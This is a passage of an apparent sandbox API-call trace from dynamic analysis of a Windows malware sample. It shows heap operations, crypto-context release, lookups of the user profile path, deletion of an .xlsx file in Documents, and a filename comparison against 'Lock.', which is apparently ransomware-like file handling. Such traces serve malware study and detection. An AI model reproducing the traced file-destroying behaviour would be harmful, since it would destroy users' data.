Flags=0x0, Size=0x10) returned 0x2e51748 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0264.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0264.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.078] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0264.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.078] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0264.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.079] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0264.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0264.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0264.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0264.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0264.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0264.081] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0264.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0264.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0264.081] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0264.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0264.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.081] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0264.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.084] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0264.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.084] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0264.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.084] FreeLibrary (hLibModule=0x756e0000) returned 1 [0264.085] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.085] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.085] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0264.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0264.085] CloseHandle (hObject=0x2d0) returned 1 [0264.088] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0264.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0264.088] CloseHandle (hObject=0x2a0) returned 1 [0264.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0264.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.102] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0264.105] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.105] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0264.106] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.106] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0264.107] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/ith_1X2kFN3hB-U9.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ith_1X2kFN3hB-U9.xlsx", lpFilePart=0x8cedf4*="ith_1X2kFN3hB-U9.xlsx") returned 0x2f [0264.107] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0264.107] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ith_1X2kFN3hB-U9.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ith_1x2kfn3hb-u9.xlsx")) returned 0x20 [0264.107] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ith_1X2kFN3hB-U9.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc77d7e0, ftCreationTime.dwHighDateTime=0x1d5cd35, ftLastAccessTime.dwLowDateTime=0x7fdfbdc0, ftLastAccessTime.dwHighDateTime=0x1d5b6d0, ftLastWriteTime.dwLowDateTime=0x7fdfbdc0, ftLastWriteTime.dwHighDateTime=0x1d5b6d0, nFileSizeHigh=0x0, nFileSizeLow=0x12e2a, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ith_1X2kFN3hB-U9.xlsx", cAlternateFileName="ITH_1X~1.XLS")) returned 0xa87110 [0264.107] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ith_1X2kFN3hB-U9.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ith_1x2kfn3hb-u9.xlsx")) returned 1 [0264.114] FindNextFileW (in: hFindFile=0xa87110, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc77d7e0, ftCreationTime.dwHighDateTime=0x1d5cd35, ftLastAccessTime.dwLowDateTime=0x7fdfbdc0, ftLastAccessTime.dwHighDateTime=0x1d5b6d0, ftLastWriteTime.dwLowDateTime=0x7fdfbdc0, ftLastWriteTime.dwHighDateTime=0x1d5b6d0, nFileSizeHigh=0x0, nFileSizeLow=0x12e2a, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ith_1X2kFN3hB-U9.xlsx", cAlternateFileName="ITH_1X~1.XLS")) returned 0 [0264.114] FindClose (in: hFindFile=0xa87110 | out: hFindFile=0xa87110) returned 1 [0264.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0264.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0264.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.114] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.115] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0264.115] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0264.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0264.115] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.115] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0264.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0264.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0264.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0264.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0264.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0264.116] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x60) returned 0x2e558d8 [0264.116] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/ith_1X2kFN3hB-U9.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ith_1X2kFN3hB-U9.xlsx", lpFilePart=0x8cf650*="ith_1X2kFN3hB-U9.xlsx") returned 0x2f [0264.116] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0264.116] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ith_1X2kFN3hB-U9.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\ith_1x2kfn3hb-u9.xlsx")) returned 0xffffffff [0264.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0264.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0264.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0264.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0264.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.117] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.117] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0264.117] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.117] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0264.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0264.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.117] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0264.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0264.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0264.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0264.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0264.118] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.118] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0264.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J30FxxC-.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 